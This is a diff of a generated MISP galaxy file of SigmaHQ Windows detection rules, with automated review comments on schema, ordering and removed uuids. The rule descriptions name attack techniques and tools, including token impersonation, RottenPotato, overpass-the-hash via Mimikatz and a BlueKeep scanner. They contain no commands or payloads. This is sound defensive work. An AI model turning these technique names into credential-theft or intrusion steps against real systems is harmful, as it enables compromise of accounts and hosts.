+ "uuid": "b237c54b-0f15-4612-a819-44b735e0de27",
+ "value": "A Security-Enabled Global Group Was Deleted"
+ },
+ {
+ "description": "Detection of logins performed with WMI",
+ "meta": {
+ "author": "Thomas Patzke",
+ "creation_date": "2019/12/04",
+ "falsepositive": [
+ "Monitoring tools",
+ "Legitimate system administration"
+ ],
+ "filename": "win_security_susp_wmi_login.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "5af54681-df95-4c26-854f-2565e13cfab0",
+ "value": "Login with WMI"
+ },
+ {
+ "description": "Detects potential token impersonation and theft. Example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS flag\".",
+ "meta": {
+ "author": "Michaela Adams, Zach Mathis",
+ "creation_date": "2022/11/06",
+ "falsepositive": [
+ "Anti-Virus"
+ ],
+ "filename": "win_security_access_token_abuse.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html",
+ "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1134.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f",
+ "value": "Potential Access Token Abuse"
+ },
+ {
+ "description": "Detects activity when a member is removed from a security-enabled global group",
+ "meta": {
+ "author": "Alexandr Yampolskyi, SOC Prime",
+ "creation_date": "2023/04/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_member_removed_security_enabled_global_group.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "02c39d30-02b5-45d2-b435-8aebfe5a8629",
+ "value": "A Member Was Removed From a Security-Enabled Global Group"
+ },
+ {
+ "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like",
+ "meta": {
+ "author": "@SBousseaden, Florian Roth",
+ "creation_date": "2019/11/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_susp_rottenpotato.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/SBousseaden/status/1195284233729777665",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.credential_access",
+ "attack.t1557.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f",
+ "value": "RottenPotato Like Attack Pattern"
+ },
+ {
+ "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network",
+ "meta": {
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "creation_date": "2020/09/02",
+ "falsepositive": [
+ "SCCM"
+ ],
+ "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.privilege_escalation",
+ "attack.persistence",
+ "attack.t1546.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648",
+ "value": "Remote WMI ActiveScriptEventConsumers"
+ },
+ {
+ "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)",
+ "creation_date": "2019/06/02",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "win_security_rdp_bluekeep_poc_scanner.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/zerosum0x0/CVE-2019-0708",
+ "https://twitter.com/AdamTheAnalyst/status/1134394070045003776",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1210",
+ "car.2013-07-002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "8400629e-79a9-4737-b387-5db940ab2367",
+ "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln"
+ },
+ {
+ "description": "Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.",
+ "meta": {
+ "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
+ "creation_date": "2023/01/19",
+ "falsepositive": [
+ "Legitimate or intentional inbound connections from public IP addresses on the RDP port."
+ ],
+ "filename": "win_security_successful_external_remote_rdp_login.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
+ "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.credential_access",
+ "attack.t1133",
+ "attack.t1078",
+ "attack.t1110"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2",
+ "value": "External Remote RDP Logon from Public IP"
+ },
+ {
+ "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.",
+ "meta": {
+ "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)",
+ "creation_date": "2018/02/12",
+ "falsepositive": [
+ "Runas command-line tool using /netonly parameter"
+ ],
+ "filename": "win_security_overpass_the_hash.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.s0002",
+ "attack.t1550.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87",
+ "value": "Successful Overpass the Hash Attempt"
+ },
+ {
+ "description": "Detects activity when a member is added to a security-enabled global group",
+ "meta": {
+ "author": "Alexandr Yampolskyi, SOC Prime",
+ "creation_date": "2023/04/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_member_added_security_enabled_global_group.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "c43c26be-2e87-46c7-8661-284588c5a53e",
+ "value": "A Member Was Added to a Security-Enabled Global Group"
+ },
+ {
+ "description": "Detect remote login by Administrator user (depending on internal pattern).",
+ "meta": {
+ "author": "juju4",
+ "creation_date": "2017/10/29",
+ "falsepositive": [
+ "Legitimate administrative activity."
+ ],
+ "filename": "win_security_admin_rdp_login.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://car.mitre.org/wiki/CAR-2016-04-005",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1078.001",
+ "attack.t1078.002",
+ "attack.t1078.003",
+ "car.2016-04-005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a",
+ "value": "Admin User Remote Logon"
+ },
{
"description": "Detects common NTLM brute force device names",
"meta": {
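Review bot: the `tags` field changes type between entries in this hunk. Three of the added clusters use `"tags": "No established tags"` (the group-deleted, member-removed and member-added entries), while every other entry carries `"tags": [ ... ]`. A consumer that iterates `tags` will iterate the characters of the placeholder string for those three, and schema validation against an array type will fail. Emit `"tags": []` (or omit the key) from the generator instead of a sentinel string, the same way the `related` block is simply absent when there is nothing to relate.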
@@ -10001,8 +9803,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://goo.gl/PsqrhT",
"https://twitter.com/JohnLaTwC/status/1004895028995477505",
+ "https://goo.gl/PsqrhT",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml"
],
"tags": [
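Review bot: this hunk only swaps the order of two `refs` entries, and the same reorder-only pattern repeats through most of the remaining hunks in this patch (ntdsutil, audit_cve, backup delete, msmpeng crash, SRP, mssql audit, USB, OpenSSH, Defender, BITS, ngrok). That is generator nondeterminism, not a content change, and it buries the few real edits (new clusters, removed clusters, the `level` change) in noise. Sort `refs` deterministically (or preserve upstream order) in the generator so a regenerate yields an empty diff when nothing changed. While here, `"https://goo.gl/PsqrhT"` is a shortener: the destination cannot be vetted from the diff, so expand it to the canonical URL.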
@@ -10070,8 +9872,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://twitter.com/mgreen27/status/1558223256704122882",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml"
],
"tags": [
@@ -10094,8 +9896,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://twitter.com/mgreen27/status/1558223256704122882",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml"
],
"tags": [
@@ -10118,11 +9920,11 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/FlemmingRiis/status/1217147415482060800",
"https://www.youtube.com/watch?v=ebmW42YYveI",
"https://twitter.com/DidierStevens/status/1217533958096924676",
"https://twitter.com/VM_vivisector/status/1217190929330655232",
"https://nullsec.us/windows-event-log-audit-cve/",
+ "https://twitter.com/FlemmingRiis/status/1217147415482060800",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml"
],
"tags": [
@@ -10200,8 +10002,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx",
"https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml"
],
"tags": [
@@ -10221,6 +10023,29 @@
"uuid": "9703792d-fd9a-456d-a672-ff92efe4806a",
"value": "Backup Catalog Deleted"
},
+ {
+ "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/21",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_msmq_corrupted_packet.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msmq/win_msmq_corrupted_packet.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "ae94b10d-fee9-4767-82bb-439b309d5a27",
+ "value": "MSMQ Corrupted Packet Encountered"
+ },
{
"description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine",
"meta": {
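Review bot: the new MSMQ cluster ties itself to CVE-2023-21554 in its description but carries only `"attack.execution"` as a tag and has no `related` block. Elsewhere in this same patch CVE-specific clusters carry a `cve.YYYY.NNNN` tag alongside the ATT&CK tags (`"cve.2023.23397"`, `"cve.2021.1675"`), which is what lets MISP users pivot on the CVE. Add `cve.2023.21554` to `tags` for consistency with that convention, and check whether the upstream rule has a technique-level tag that the `related` mapping should pick up.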
@@ -10234,8 +10059,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://technet.microsoft.com/en-us/library/security/4022344",
+ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml"
],
"tags": [
@@ -10276,8 +10101,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://technet.microsoft.com/en-us/library/security/4022344",
+ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_application_msmpeng_crash_error.yml"
],
"tags": [
@@ -10387,8 +10212,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies",
"https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv",
+ "https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml"
],
"tags": [
@@ -10421,9 +10246,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
"https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31",
"https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
+ "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml"
],
"tags": [
@@ -10746,9 +10571,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
"https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
"https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml"
],
"tags": [
@@ -10869,8 +10694,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/",
"https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/",
+ "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml"
],
"tags": [
@@ -11040,30 +10865,6 @@
"uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262",
"value": "Suspicious Rejected SMB Guest Logon From IP"
},
- {
- "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/04/05",
- "falsepositive": [
- "Some false positives may occur from external trusted servers. Apply additional filters accordingly"
- ],
- "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/connectivity/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "cve.2023.23397"
- ]
- },
- "uuid": "de96b824-02b0-4241-9356-7e9b47f04bac",
- "value": "Potential CVE-2023-23397 Exploitation Attempt - SMB"
- },
{
"description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache",
"meta": {
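Review bot: this hunk deletes the cluster `de96b824-02b0-4241-9356-7e9b47f04bac` ("Potential CVE-2023-23397 Exploitation Attempt - SMB") outright. Galaxy cluster uuids are what MISP events and other galaxies reference, so any instance that already tagged events with this cluster loses resolution after sync. The patch gives no indication whether the upstream rule was removed or merely relocated from `rules/windows/builtin/smbclient/connectivity/`; if it only moved, the entry should be updated in place with the new path rather than dropped, and if it was genuinely retired, the commit message should say so and the uuid should be kept in a deprecated state rather than disappearing.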
@@ -11100,11 +10901,11 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
"https://winaero.com/enable-openssh-server-windows-10/",
+ "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
"https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
- "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
"https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH",
+ "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml"
],
"tags": [
@@ -11124,76 +10925,6 @@
"uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781",
"value": "OpenSSH Server Listening On Socket"
},
- {
- "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675",
- "meta": {
- "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton",
- "creation_date": "2021/06/30",
- "falsepositive": [
- "Problems with printer drivers"
- ],
- "filename": "win_exploit_cve_2021_1675_printspooler.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/hhlxf/PrintNightmare",
- "https://github.com/afwu/PrintNightmare",
- "https://twitter.com/fuzzyf10w/status/1410202370835898371",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675"
- ]
- },
- "related": [
- {
- "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718",
- "value": "Possible CVE-2021-1675 Print Spooler Exploitation"
- },
- {
- "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/07/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/MalwareJake/status/1410421967463731200",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675"
- ]
- },
- "related": [
- {
- "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a",
- "value": "CVE-2021-1675 Print Spooler Exploitation"
- },
{
"description": "Detect standard users login that are part of high privileged groups such as the Administrator group",
"meta": {
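Review bot: same removal concern as with the CVE-2023-23397 cluster earlier in this patch, now for two uuids at once (`4e64668a-4da1-49f5-a8df-9e2d5b866718` and `f34d942d-c8c4-4f1f-b196-22471aecf10a`), both `high`/`critical` PrintNightmare detections that map to `d157f9d2-d09a-4efa-bb2a-64963f94e253`. Dropping stable uuids silently breaks existing event tags; confirm whether the upstream `rules/windows/builtin/printservice/` files were deleted or moved, and prefer updating the `refs`/`filename` or marking the clusters deprecated over deleting them.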
@@ -11203,12 +10934,12 @@
"Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field"
],
"filename": "win_lsa_server_normal_user_admin.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection",
"https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml",
+ "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection",
"https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml"
],
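Review bot: the `level` downgrade from `high` to `medium` on `win_lsa_server_normal_user_admin.yml` is a semantic change buried in a patch that is otherwise mostly `refs` reordering, and nothing in the hunk (description, falsepositive text, refs set) explains it. Call it out in the commit message so consumers who alert on `level` know the threshold moved. Separately, the falsepositive string in context reads as sentence fragments ("These users shouldn't have these right. But in the case where it's necessary. They should be filtered out ..."); that is inherited from the upstream rule, so the fix belongs in SigmaHQ rather than in this generated file.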
@@ -11257,8 +10988,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
"https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
+ "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml"
],
"tags": [
@@ -11360,8 +11091,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/duff22b/status/1280166329660497920",
"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands",
+ "https://twitter.com/duff22b/status/1280166329660497920",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml"
],
"tags": [
@@ -11423,6 +11154,41 @@
"uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f",
"value": "Windows Defender Exclusions Added"
},
+ {
+ "description": "Detects issues with Windows Defender Real-Time Protection features",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)",
+ "creation_date": "2023/03/28",
+ "falsepositive": [
+ "Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required"
+ ],
+ "filename": "win_defender_real_time_protection_errors.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346",
+ "Internal Research",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "dd80db93-6ec2-4f4c-a017-ad40da6ffe81",
+ "value": "Windows Defender Real-Time Protection Failure/Restart"
+ },
{
